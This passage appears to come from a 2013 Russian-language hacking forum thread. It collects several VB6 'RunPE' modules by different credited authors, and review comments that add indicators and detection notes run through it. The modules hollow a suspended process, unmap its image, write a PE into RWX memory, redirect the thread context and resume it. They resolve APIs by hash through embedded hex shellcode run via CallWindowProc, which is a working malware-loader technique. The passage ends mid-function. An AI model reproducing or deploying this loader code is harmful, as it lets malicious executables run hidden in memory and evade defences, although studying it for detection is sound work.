    Call MoveMemory(Varptr(sImageBase), Varptr(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
     
    ' Offset 80: SizeOfImage.
    Call MoveMemory(Varptr(SizeOfImage), Varptr(IMAGE_NT_HEADERS(80)), &H1 + &H4 + &H3)
     
    ' Offset 84: SizeOfHeaders.
    Call MoveMemory(Varptr(SizeOfHeaders), Varptr(IMAGE_NT_HEADERS(84)), &H1 + &H4 + &H3)
     
    ' Offset 40: AddressOfEntryPoint.
    Call MoveMemory(Varptr(sEntryPoint), Varptr(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
     
    ' Offset 6: FileHeader.NumberOfSections.
    Call MoveMemory(Varptr(sSection), Varptr(IMAGE_NT_HEADERS(6)), &H2)
     
    ' sHost is passed as the command line; dwCreationFlags = &H4 (CREATE_SUSPENDED).
    Call  sHashInv("KERNEL32", &H16B3FE88, 0, StrPtr(sHost), 0, 0, &H1,  &H4, 0, 0, Varptr(STARTUPINFO(CLng("0"))),  Varptr(PROCESS_INFORMATION(CLng("0"))))
     
    ' PROCESS_INFORMATION: hProcess at offset 0, hThread at offset 4.
    Call MoveMemory(Varptr(sProcess), Varptr(PROCESS_INFORMATION(CLng("0"))), &H1 + &H3)
     
    Call MoveMemory(Varptr(sThread), Varptr(PROCESS_INFORMATION(4)), &H1 + &H3)
     
    Call sHashInv("NTDLL", &HF21037D0, sProcess, sImageBase)
     
    ' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
    Call sHashInv("KERNEL32", &H6E1A959C, sProcess, sImageBase, SizeOfImage, &H3000&, &H40)
     
    ' Headers first.
    Call sHashInv("NTDLL", &HC5108CC2, sProcess, sImageBase, Varptr(sBytes(CLng("0"))), SizeOfHeaders, CLng("0"))
     
    ' Then one write per section header (40 bytes each).
    For D = 0 To sSection - 1
     
    Call MoveMemory(Varptr(IMAGE_SECTION_HEADER(CLng("0"))), Varptr(sBytes(sParams + sVALUE + 40 * D)), &H40)
     
    ' Offset 12: VirtualAddress.
    Call MoveMemory(Varptr(sVirtualAddress), Varptr(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
     
    ' Offset 16 is SizeOfRawData and offset 20 is PointerToRawData; the variable
    ' names are the other way round from the fields they receive.
    Call MoveMemory(Varptr(sRawDataPoint), Varptr(IMAGE_SECTION_HEADER(16)), &H1 + &H4 + &H3)
     
    Call MoveMemory(Varptr(sRawData), Varptr(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
     
    Call  sHashInv("NTDLL", &HC5108CC2, sProcess, sImageBase +  sVirtualAddress, Varptr(sBytes(sRawData)), sRawDataPoint, CLng("0"))
     
    Next
     
    Call sHashInv("NTDLL", &HE935E393, sThread, Varptr(tCONTEXT(CLng("0"))))
     
    Call  sHashInv("NTDLL", &HC5108CC2, sProcess, sEbx + &H4 + &H1 +  &H3, Varptr(sVirtualAddress), &H1 + &H3 + &H2,  CLng("0"))
     
    ' Byte offset 176 (&HB0) is Eax in the x86 CONTEXT layout; it receives
    ' sImageBase + sEntryPoint.
    Call MoveMemory(Varptr(tCONTEXT(176)), Varptr(sImageBase + sEntryPoint), &H1 + &H3)
     
    Call MoveMemory(Varptr(sEntryPoint), Varptr(tCONTEXT(176)), &H1 + &H3)
     
    Call sHashInv("NTDLL", &H6935E395, sThread, Varptr(tCONTEXT(CLng("0"))))
     
    Call sHashInv("NTDLL", &HC54A46C8, sThread, CLng("0"))
     
    End Function
     
     
    ' MoveMemory: copies cBytes bytes from lpSource to lpDest by running the
    ' routine stored in sMEMORY. The routine is reached through a USER32 export
    ' resolved by hash (&HC8358393) and called with the routine's address as its
    ' first argument. NOTE(review): presumably a CallWindowProc variant - the hash
    ' is not labelled anywhere on the page, confirm.
    Public Sub MoveMemory(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)
     
        Call sHashInv("USER32", &HC8358393, Varptr(sMEMORY(0)), lpDest, lpSource, cBytes, CLng("0"))
     
    End Sub
     
     
     
     
    ' sHashInv: calls the export of sDll identified by the 32-bit hash sHashCode.
    '
    ' Parameters:
    '   sDll      - module name handed to the resolver stub.
    '   sHashCode - hash value identifying the export.
    '   sParams   - arguments, each emitted as a 32-bit push.
    ' Returns the callee's result.
    '
    ' Both stubs live in local arrays and are rebuilt on every call. Analyst note:
    ' the 171 resolver bytes are identical to the ones in the other listings on
    ' this page, so one byte signature covers all variants; the only import the
    ' module declares is CallWindowProcA.
    Function sHashInv(ByVal sDll As String, ByVal sHashCode As Long, ParamArray sParams() As Variant) As Long
     
     
        Dim vItem                      As Variant
        Dim i                          As Long
        Dim W                          As Long
        Dim sAsmPtr(0 To 170)      As Byte
        Dim sAsmCode(0 To 255)      As Byte
     
     
     
            ' Resolver stub. Visible patterns: 64 8B 70 30 (load from fs:[..+30h], the
            ' PEB pointer) and C1 CF 0D (ror edi, 0Dh), consistent with matching export
            ' names by a rotate-right-13 hash - hedged, confirm by disassembly.
            For Each vItem In Array _
    _
    _
            (&HE8, &H22, &H0, &H0, &H0, &H68,  &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43,  &H0, &H0, &H0, &H83, &HC4, &H8, _
            &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF,  &H74, &H24, &H8, &H50, &HE8, &H30, &H0,  &H0, &H0, &H83, &HC4, &H8, _
            &HC3,  &H56, &H55, &H31, &HC0, &H64, &H8B, &H70,  &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C,  &H8B, &H6E, &H8, _
            &H8B, &H7E, &H20,  &H8B, &H36, &H38, &H47, &H18, &H75, &HF3,  &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F,  &H4B, _
            &H74, &H2, &HEB, &HE7, &H89,  &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51,  &H53, &H56, &H57, &H8B, &H6C, _
            &H24,  &H1C, &H85, &HED, &H74, &H43, &H8B, &H45,  &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA,  &H8B, _
            &H4A, &H18, &H8B, &H5A, &H20,  &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34,  &H8B, &H1, &HEE, _
            &H31, &HFF, &H31,  &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7,  &HC1, &HCF, &HD, &H1, _
            &HC7, &HEB,  &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1,  &H8B, &H5A, &H24, &H1, _
            &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, _
            &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3)
     
     
            sAsmPtr(i) = vItem: i = i + 1
            Next vItem: i = 0
     
     
            ' Arguments are emitted last-to-first; &H68 is PUSH imm32, followed by
            ' the four bytes of the value.
            For W = UBound(sParams) To LBound(sParams) Step -1
     
                sAsmCode(i) = "&H" & "68"
                i = i + 1
                sAsmCode(i) = sLong(sParams(W)).B1
                i = i + 1
                sAsmCode(i) = sLong(sParams(W)).B2
                i = i + 1
                sAsmCode(i) = sLong(sParams(W)).B3
                i = i + 1
                sAsmCode(i) = sLong(sParams(W)).B4
                i = i + 1
     
            Next W
     
     
                ' &HB8 is MOV EAX, imm32. The immediate is the address returned by the
                ' resolver, which is executed once for each of the four bytes.
                sAsmCode(i) = "&H" & "B8"
                i = i + 1
                sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B1
                i = i + 1: _
                sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B2
                i = i + 1: _
                sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B3
                i = i + 1: _
                sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B4
                i = i + 1: _
                sAsmCode(i) = "&H" & "FF": i = i + 1: sAsmCode(i) = "&H" & "D0"
                i = i + 1: _
                sAsmCode(i) = "&H" & "C3"
                i = i + 1: _
                sHashInv = CallWindowProcA(Varptr(sAsmCode(0)))
     
     
    End Function
     
    ' sLong: returns the four bytes of lLong as a DWORD_B (B1 first in memory).
    ' LSet copies the raw bytes of the DWORD_L record onto the DWORD_B result.
    Private Function sLong(ByVal lLong As Long) As DWORD_B
     
        Dim tL              As DWORD_L
     
        tL.D1 = lLong: LSet sLong = tL
     
    End Function
    --- добавлено: 23 дек 2013 в 14:14 ---
    Part 2

    Код:
    Option Explicit
     
    '---------------------------------------------------------------------------------------
    ' Module    : mshRunPE_Strings
    ' Author    : iCodeInVB6
    ' Now      : 05/16/2012 11:40
    ' Purpose  : Run executable in memory
    '            Only uses CallWindowProc & shellcode
    ' Credits  : hamavb <-- made the shellcode!
    ' Tested    : Win7 x64
    '---------------------------------------------------------------------------------------
     
    'USER32
    Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
     
    Private s_ASM(7) As String
    Private b_ASM(1287) As Byte
     
    ' RunPE: decodes a 1288-byte x86 blob from eight hex strings into b_ASM and
    ' executes it through CallWindowProcW, passing the host path and the address
    ' of the payload buffer as the first two arguments. All further work happens
    ' inside the blob; the VB code itself calls no other API.
    '
    ' Parameters:
    '   TargetHost - path of the executable the blob receives as its first argument.
    '   bBuffer    - raw bytes of the PE file; its address is the second argument.
    '
    ' Analyst notes (from the visible hex only):
    '  * s_ASM(0) contains the UTF-16 strings "kernel32" (6B00650072006E0065006C00
    '    330032) and "ntdll" (6E00740064006C006C).
    '  * The blob contains PUSH immediates that equal hash constants labelled in
    '    the first listing on this page, for example 6888FEB316 (&H16B3FE88,
    '    CreateProcessW) and 68D03710F2 (&HF21037D0, NtUnmapViewOfSection). It is
    '    therefore presumably the same hollowing sequence (MITRE ATT&CK T1055.012)
    '    done entirely in shellcode - confirm by disassembly.
    '  * The end of s_ASM(6) and s_ASM(7) hold a by-hash export resolver of the
    '    same shape as the ones in the other listings (C1CF0D, 3B7C2420).
    '  * The hex fragments and the byte patterns above are usable as static
    '    signatures; the run-time behaviour is unchanged by the packaging.
    Public Sub RunPE(ByVal TargetHost As String, bBuffer() As Byte)
        Dim i As Long
        Dim j As Long
        Dim k As Long
     
        s_ASM(0) = "60E84E0000006B00650072006E0065006C003300320000006E00740064006C006C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F030000"
        s_ASM(1) = "6A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C0300008B09C701440000006A12E84D030000685BE814CF51E8790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF31FFD06A12E823030000685BE814CF51E84F0300006A1EE8110300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200008B0968F80000005751FFD06A00E8E80200006888FEB31651E8140300006A2EE8D60200"
        s_ASM(2) = "008B396A2AE8CD0200008B116A42E8C402000057526A006A006A046A006A006A006A00FF31FFD06A12E8A902000068D03710F251E8D50200006A22E8970200008B116A2EE88E0200008B09FF7234FF31FFD06A00E87E020000689C951A6E51E8AA0200006A22E86C0200008B118B396A2EE8610200008B096A406800300000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E0200008B396A3EE8350200"
        s_ASM(3) = "008B316A22E82C0200008B016A2EE8230200008B0952FF775456FF7034FF316A00E81002000068A16A3DD851E83C02000083C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8CE010000C70100000000B8280000006A36E8BC010000F7216A1EE8B30100008B118B523C81C2F800000003D06A3EE89F01000003116A26E8960100006A"
        s_ASM(4) = "2852FF316A12E88A010000685BE814CF51E8B601000083C40CFFD06A26E8730100008B398B098B71146A3EE86501000003316A26E85C0100008B098B510C6A22E8500100008B090351346A46E8440100008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F4000000"
        s_ASM(5) = "8B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD06A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400000083C6086A2EE89D0000008B116A46E894000000516A045756FF326A00E88600000068A16A3DD851E8B200000083C40CFFD06A22E86F0000008B098B51280351346A32E8600000008B0981C1B000000089116A00E8"
        s_ASM(6) = "4F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A2EE8340000008B09FF32FF7104FFD06A00E82400000068883F4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CAAF9151E81E0000006A406800100000FF7424186A00FFD0FF742414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E84B00000083C408FF742404"
        s_ASM(7) = "FFD0FF74240850E83800000083C408C355525153565733C0648B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE330498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F5E5B595A5DC3C300000000"
     
        ' Each string is 322 hex characters = 161 bytes; 8 x 161 = 1288 bytes,
        ' which fills b_ASM(0 To 1287).
        For i = 0 To 7
            For j = 1 To 322 Step 2
                b_ASM(k) = CByte("&H" & Mid$(s_ASM(i), j, 2)): k = k + 1
            Next j
        Next i
     
        ' Transfers control to the decoded bytes. The hWnd and Msg slots of
        ' CallWindowProcW carry the host path pointer and the payload pointer.
        CallWindowProcW VarPtr(b_ASM(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0
    End Sub
    Код:
    Attribute VB_Name = "MasterRunpe"
    '---------------------------------------------------------------------------
    'Coded By Assassin
    'Modul:MasterRunpe.bas
    'Hakkinda: Runpe:= exeyi callwindowproc apisi ile bellekte acma projesi ---
    'MasterRunpe Shellcode Runpe
    'alian Sistemler: Win XP,WiN ViSTA,WiN7,WiN8
    'x64 / x86 alir.
    'Date: 19 Mart 2013 - 15:30
    'Visual Basic 5 ve Visual Basic 6 da Calisir
    '---------------------------------------------------------------------------
    Private Declare Function CallWindowProcW Lib "user32" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
     
    Public Sub bellekteac(ByVal UzakYol As String, Byteveri() As Byte)
    Dim toplamveri As String
    toplamveri = toplamveri & "96HC232HC78HC0HC0HC0HC107HC0HC101HC0HC114HC0HC110HC0HC101HC0HC108HC0HC51HC0HC50HC0HC0HC0HC110HC0HC116HC0HC100HC0HC108HC0HC108HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC91HC139HC252HC106HC66HC232HC187HC3HC0HC0HC139HC84HC36HC40HC137HC17HC139HC84HC36HC44HC106HC62HC232HC170HC3HC0HC0HC137HC17HC106HC74HC232HC161HC3HC0HC0HC137HC57HC106HC30HC106HC60HC232HC157HC3HC0HC0HC106HC34HC104HC244HC0HC0HC0HC232HC145HC3HC0HC0HC106HC38HC106HC36HC232HC136HC3HC0HC0HC106HC42HC106HC64HC232HC127HC3HC0HC0"
    toplamveri = toplamveri & "HC106HC46HC106HC12HC232HC118HC3HC0HC0HC106HC50HC104HC200HC0HC0HC0HC232HC106HC3HC0HC0HC106HC42HC232HC92HC3HC0HC0HC139HC9HC199HC1HC68HC0HC0HC0HC106HC18HC232HC77HC3HC0HC0HC104HC91HC232HC20HC207HC81HC232HC121HC3HC0HC0HC106HC62HC232HC59HC3HC0HC0HC139HC209HC106HC30HC232HC50HC3HC0HC0HC106HC64HC255HC50HC255HC49HC255HC208HC106HC18HC232HC35HC3HC0HC0HC104HC91HC232HC20HC207HC81HC232HC79HC3HC0HC0HC106HC30HC232HC17HC3HC0HC0HC139HC9HC139HC81HC60HC106HC62HC232HC5HC3HC0HC0HC139HC57HC3HC250HC106HC34HC232HC250HC2HC0HC0HC139HC9HC104HC248HC0HC0HC0HC87HC81HC255HC208HC106HC0HC232HC232HC2HC0HC0HC104HC136HC254HC179HC22HC81HC232HC20HC3HC0HC0HC106HC46HC232HC214HC2HC0"
    toplamveri = toplamveri & "HC0HC139HC57HC106HC42HC232HC205HC2HC0HC0HC139HC17HC106HC66HC232HC196HC2HC0HC0HC87HC82HC106HC0HC106HC0HC106HC4HC106HC0HC106HC0HC106HC0HC106HC0HC255HC49HC255HC208HC106HC18HC232HC169HC2HC0HC0HC104HC208HC55HC16HC242HC81HC232HC213HC2HC0HC0HC106HC34HC232HC151HC2HC0HC0HC139HC17HC106HC46HC232HC142HC2HC0HC0HC139HC9HC255HC114HC52HC255HC49HC255HC208HC106HC0HC232HC126HC2HC0HC0HC104HC156HC149HC26HC110HC81HC232HC170HC2HC0HC0HC106HC34HC232HC108HC2HC0HC0HC139HC17HC139HC57HC106HC46HC232HC97HC2HC0HC0HC139HC9HC106HC64HC104HC0HC48HC0HC0HC255HC114HC80HC255HC119HC52HC255HC49HC255HC208HC106HC54HC232HC71HC2HC0HC0HC139HC209HC106HC34HC232HC62HC2HC0HC0HC139HC57HC106HC62HC232HC53HC2HC0"
    toplamveri = toplamveri & "HC0HC139HC49HC106HC34HC232HC44HC2HC0HC0HC139HC1HC106HC46HC232HC35HC2HC0HC0HC139HC9HC82HC255HC119HC84HC86HC255HC112HC52HC255HC49HC106HC0HC232HC16HC2HC0HC0HC104HC161HC106HC61HC216HC81HC232HC60HC2HC0HC0HC131HC196HC12HC255HC208HC106HC18HC232HC249HC1HC0HC0HC104HC91HC232HC20HC207HC81HC232HC37HC2HC0HC0HC106HC34HC232HC231HC1HC0HC0HC139HC17HC131HC194HC6HC106HC58HC232HC219HC1HC0HC0HC106HC2HC82HC81HC255HC208HC106HC54HC232HC206HC1HC0HC0HC199HC1HC0HC0HC0HC0HC184HC40HC0HC0HC0HC106HC54HC232HC188HC1HC0HC0HC247HC33HC106HC30HC232HC179HC1HC0HC0HC139HC17HC139HC82HC60HC129HC194HC248HC0HC0HC0HC3HC208HC106HC62HC232HC159HC1HC0HC0HC3HC17HC106HC38HC232HC150HC1HC0HC0HC106"
    toplamveri = toplamveri & "HC40HC82HC255HC49HC106HC18HC232HC138HC1HC0HC0HC104HC91HC232HC20HC207HC81HC232HC182HC1HC0HC0HC131HC196HC12HC255HC208HC106HC38HC232HC115HC1HC0HC0HC139HC57HC139HC9HC139HC113HC20HC106HC62HC232HC101HC1HC0HC0HC3HC49HC106HC38HC232HC92HC1HC0HC0HC139HC9HC139HC81HC12HC106HC34HC232HC80HC1HC0HC0HC139HC9HC3HC81HC52HC106HC70HC232HC68HC1HC0HC0HC139HC193HC106HC46HC232HC59HC1HC0HC0HC139HC9HC80HC255HC119HC16HC86HC82HC255HC49HC106HC0HC232HC42HC1HC0HC0HC104HC161HC106HC61HC216HC81HC232HC86HC1HC0HC0HC131HC196HC12HC255HC208HC106HC54HC232HC19HC1HC0HC0HC139HC17HC131HC194HC1HC137HC17HC106HC58HC232HC5HC1HC0HC0HC139HC9HC59HC202HC15HC133HC51HC255HC255HC255HC106HC50HC232HC244HC0HC0HC0"
    toplamveri = toplamveri & "HC139HC9HC199HC1HC7HC0HC1HC0HC106HC0HC232HC229HC0HC0HC0HC104HC210HC199HC167HC104HC81HC232HC17HC1HC0HC0HC106HC50HC232HC211HC0HC0HC0HC139HC17HC106HC46HC232HC202HC0HC0HC0HC139HC9HC82HC255HC113HC4HC255HC208HC106HC34HC232HC187HC0HC0HC0HC139HC57HC131HC199HC52HC106HC50HC232HC175HC0HC0HC0HC139HC49HC139HC182HC164HC0HC0HC0HC131HC198HC8HC106HC46HC232HC157HC0HC0HC0HC139HC17HC106HC70HC232HC148HC0HC0HC0HC81HC106HC4HC87HC86HC255HC50HC106HC0HC232HC134HC0HC0HC0HC104HC161HC106HC61HC216HC81HC232HC178HC0HC0HC0HC131HC196HC12HC255HC208HC106HC34HC232HC111HC0HC0HC0HC139HC9HC139HC81HC40HC3HC81HC52HC106HC50HC232HC96HC0HC0HC0HC139HC9HC129HC193HC176HC0HC0HC0HC137HC17HC106HC0HC232"
    toplamveri = toplamveri & "HC79HC0HC0HC0HC104HC211HC199HC167HC232HC81HC232HC123HC0HC0HC0HC106HC50HC232HC61HC0HC0HC0HC139HC209HC106HC46HC232HC52HC0HC0HC0HC139HC9HC255HC50HC255HC113HC4HC255HC208HC106HC0HC232HC36HC0HC0HC0HC104HC136HC63HC74HC158HC81HC232HC80HC0HC0HC0HC106HC46HC232HC18HC0HC0HC0HC139HC9HC255HC113HC4HC255HC208HC106HC74HC232HC4HC0HC0HC0HC139HC33HC97HC195HC139HC203HC3HC76HC36HC4HC195HC106HC0HC232HC242HC255HC255HC255HC104HC84HC202HC175HC145HC81HC232HC30HC0HC0HC0HC106HC64HC104HC0HC16HC0HC0HC255HC116HC36HC24HC106HC0HC255HC208HC255HC116HC36HC20HC232HC207HC255HC255HC255HC137HC1HC131HC196HC16HC195HC232HC34HC0HC0HC0HC104HC164HC78HC14HC236HC80HC232HC75HC0HC0HC0HC131HC196HC8HC255HC116HC36HC4"
    toplamveri = toplamveri & "HC255HC208HC255HC116HC36HC8HC80HC232HC56HC0HC0HC0HC131HC196HC8HC195HC85HC82HC81HC83HC86HC87HC51HC192HC100HC139HC112HC48HC139HC118HC12HC139HC118HC28HC139HC110HC8HC139HC126HC32HC139HC54HC56HC71HC24HC117HC243HC128HC63HC107HC116HC7HC128HC63HC75HC116HC2HC235HC231HC139HC197HC95HC94HC91HC89HC90HC93HC195HC85HC82HC81HC83HC86HC87HC139HC108HC36HC28HC133HC237HC116HC67HC139HC69HC60HC139HC84HC40HC120HC3HC213HC139HC74HC24HC139HC90HC32HC3HC221HC227HC48HC73HC139HC52HC139HC3HC245HC51HC255HC51HC192HC252HC172HC132HC192HC116HC7HC193HC207HC13HC3HC248HC235HC244HC59HC124HC36HC32HC117HC225HC139HC90HC36HC3HC221HC102HC139HC12HC75HC139HC90HC28HC3HC221HC139HC4HC139HC3HC197HC95HC94HC91HC89HC90HC93HC195HC195HC0HC0HC0HC0"
    Dim asmbyte() As Byte
    Dim bol() As String
    bol = Split(toplamveri, "HC")
    ReDim asmbyte(UBound(bol)) As Byte
    Dim i As Long
    For i = 0 To UBound(bol)
    asmbyte(i) = CByte("&" & "H" & Hex(bol(i)))
    Next i
    CallWindowProcW VarPtr(asmbyte(0)), StrPtr(UzakYol), VarPtr(Byteveri(0)), 0, 0
    End Sub
    Код:
    ' =================================================================
    ' =================================================================
    ' => Autor: Pink
    ' => RunPE ASM en Linea
    ' => Uso RunPE(Puntero Base Ejecutable) 'Pointer PE Image
    ' => Fecha : 30|04|2013
    ' => Todos los Creditos para covetous.eyes
    ' => Requisitos: Ejecutable debe tener tabla de relocalizaciones | PE Image must have relocation table
    ' =================================================================
    ' =================================================================
     
     
    vb Código:
    Option Explicit
     
    Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
     
     
    Public Function RunPE(PE_Puntero As Long)
    ' Decodes an embedded hex string into a Byte array and then has USER32 call
    ' into that array as if it were a window procedure, so the decoded bytes are
    ' executed as native code inside the calling process.
    '
    ' PE_Puntero: per the author's header, a pointer to the base of a PE image in
    '             memory. It is passed in the hWnd slot, so it reaches the blob as
    '             its first argument.
    ' Returns:    nothing useful. No return type is declared and RunPE is never
    '             assigned, so callers always receive Empty and cannot see failures.
    '
    ' NOTE(review): the machine code in Str_OP is opaque and was not reviewed here.
    ' The header's "must have relocation table" requirement suggests the image is
    ' mapped inside the calling process rather than into a separate host process;
    ' confirm in a disassembler inside an isolated analysis environment.
    '
    ' Analyst notes:
    ' - Static indicator: a long hex-digit string literal decoded into a Byte
    '   array, followed by CallWindowProcW whose first argument is VarPtr() of
    '   that array, in a module that creates or subclasses no window.
    ' - Runtime indicator: a thread executing from a private, non-image memory
    '   region (the array's data) with USER32!CallWindowProcW on the call stack.
    ' - Mitigation: the array is ordinary data memory, so this presumably only
    '   works where DEP/NX is not enforced for the process - verify; enforcing
    '   DEP for legacy 32-bit binaries should make the call fault instead.
    Dim OP_Array() As Byte
    Dim Str_OP  As String
    Dim i As Long
     
    ' Embedded payload: machine code written as hex digits, two per byte.
    Str_OP = "5589E5FF7508E804000000C9C204005589E583EC3C5751508B450483E80B505B8D9BFA020000538F45F7E88F0200008945FB" & _
          "68F066246353FF75FBE8DF0200008945CC6880EFF81553FF75FBE8CE0200008945D4682207E47153FF75FBE8BD0200008945D08" & _
          "D4DCC894DE0FF7508E87100000083F8007462508F45C46A046800301000FF704C6A006AFFFF55CC8945C8FF75C8FF7508FF75C4" & _
          "FF75E0E88F000000FF75C8FF75F7FF75E0E86203000085C07427FF75C4FF75C8E8E5020000FF75C8FF7508FF75C4FF75E0E8BE0" & _
          "000008B75C48B46240345C8FFE058595F8B45E4C9C204005589E583EC0460FF75085A66813A4D5A75108B4A3C01CA813A504500" & _
          "0075038D52048955FC61FF75FC58C9C204005589E5608B55088B750C0372148B7A0C037D108B4A10FCF3A461C9C20C005589E58" & _
          "3EC14608B550C0FB742028945EC8D52148D5A608B425CBA08000000F7E201D88945F8B8280000008B55ECF7E20345F82B451089" & _
          "C18B7D148B7510F3A48B4DEC8B5DF8FF7514FF751053E890FFFFFF83C3284975EE61C9C210005589E583EC186031C08945FC8B5" & _
          "50C0FB742028945E883C2148B421C8945EC8D5A608B425CBA08000000F7E201D88945F0B8280000008B55E8F7E20345F08B5D10" & _
          "29D88945F48B55088D45F8506A02FF75F4FF7514FF520885C074218B4DE88B5DF0FF7510FF751453FF7508E81400000085C0740" & _
          "883C328E2E8FF45FC618B45FCC9C210005589E583EC0C6031DB895DF88B550C8B5A2481E3000000E081FB000000E0750AB84000" & _
          "00008945F4EB598B5A2481E30000006081FB00000060750AB8200000008945F4EB3E8B5A2481E3000000C081FB000000C0750AB" & _
          "8040000008945F4EB238B5A2481E30000004081FB00000040750AB8020000008945F4EB08B8010000008945F48B550C8B420C03" & _
          "45108B4D088D7DFC57FF75F4FF720850FF510885C07403FF45F8618B45F8C9C210005589E583EC0460648B0D300000008B790C8" & _
          "B7F1CFF77088F45FCFF77205B8B3F0FB6431885C075EC0FB60383F84B740583F86B75DF61FF75FC58C9C35589E552518B550868" & _
          "000000005951C1C907310C248A0A8D520184C975F158595AC9C204005589E583EC046068000000008F45FCFF75085E0FB70E81F" & _
          "94D5A0000755D0FB77E3C01F7813F50450000754FFF77785901F18B5918516A005AFF7120588D0406FF305F01F75057FF550C3B" & _
          "45105874108D40048D520183EB0109DB75E359EB1B5FD1E20357240FB70432C1E00201F003471C8B188D1C1E538F45FC61FF75F" & _
          "C58C9C20C005589E5608B55088B5D0C8B5B3029DA745885DB74548B450C8B989C000000035D088B430485C074418D48F8D1E98D" & _
          "7B080FB7075289C2C1E80C8B75086681E2FF0F033301D65A48750789D0C1E810EB064875080FB7C2660106EB054875020116474" & _
          "7E2CC035B04EBB861C9C208005589E583EC1C6031C0408945FC8B55108B423C8D8402800000008B0001D08945E48D7DE8B91400" & _
          "0000B000F3AA8B5DE48D75E889DFB914000000F3A6741853FF7510FF750CFF7508E81400000085C0740883C314EBDAFF45FC618" & _
          "B45FCC9C20C005589E583EC0C608B45148B400C0345108B5D0850FF530485C074638945FC8B55148B020345108945F48B421003" & _
          "45108945F831C98B45F401C88B0085C0743589C325000000807536035D108D5B0289D85153E831FEFFFF50FF750CFF75FCE84AF" & _
          "EFFFF5985C074168B5DF801CB890383C104EBC061B801000000C9C2100061B800000000C9C2100000000000"
     
     
    ' One output byte per two hex characters.
    ReDim OP_Array((Len(Str_OP) / 2) - 1)
    ' Walk the string two characters at a time; each pair is parsed as one hex byte.
    For i = 1 To Len(Str_OP) - 1 Step 2
    OP_Array(Int(i / 2)) = CByte("&h" & Mid(Str_OP, i, 2))
    Next
     
    ' The address of the decoded bytes goes where CallWindowProcW expects a window
    ' procedure, so USER32 transfers control into the array. No window is involved;
    ' the API is used only as a way to call an arbitrary address from VB6.
    CallWindowProcW VarPtr(OP_Array(0)), PE_Puntero, 0, 0, 0
     
     
     
    End Function
    Код:
    'Author : hamavb
    'First cut : 02/03/2012 16:50
    'Credits : karcrack & cobein
    Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    Public Function ShRunPE(ByVal TargetHost As String, bBuffer() As Byte)
    ' Fills a Currency array with numeric literals and then has USER32 call into
    ' that array as if it were a window procedure, so the literals' in-memory bytes
    ' are executed as native code inside the calling process.
    '
    ' TargetHost: string whose character pointer (StrPtr) reaches the blob as its
    '             first argument. NOTE(review): presumably the path of a host
    '             executable, going by the name and the credited kRunPe module -
    '             not verified.
    ' bBuffer:    Byte array whose first-element address reaches the blob as its
    '             second argument; presumably the PE image to run - not verified.
    '             bBuffer(0) raises a subscript error if the array is empty.
